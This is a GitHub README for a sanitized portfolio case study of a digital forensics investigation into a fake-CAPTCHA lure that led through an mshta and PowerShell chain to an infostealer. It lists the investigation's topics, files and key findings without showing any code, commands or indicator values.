yev-cyber/dfir-malware-investigation

# Fake CAPTCHA to Infostealer: DFIR Malware Investigation Case Study The project highlights investigation methodology, evidence review, process chain analysis, IOC extraction, and defensive remediation without exposing sensitive internal data. ## What this project covers - Fake CAPTCHA social engineering workflow - mshta.exe and PowerShell execution chain analysis - Obfuscated and deobfuscated script review - Suspected LOTL technique assessment - AMSI and event logging bypass indicators - IOC extraction and infrastructure review - Investigation conclusions and remediation steps ## Safety and Privacy Note This repository contains a sanitized portfolio version of a malware investigation case study. Sensitive identifiers, internal references, and operational details have been removed or generalized. The material is shared for educational and professional portfolio purposes only. ## Files - PDF case study - IOC summary - Short executive summary ## Key Findings - Suspicious fake CAPTCHA flow led to command execution behavior - mshta.exe and PowerShell were involved in the observed chain - Obfuscated scripting and repeated background execution suggested malicious intent - Indicators pointed to infostealer-style objectives - Investigation produced actionable IOCs and remediation outcomes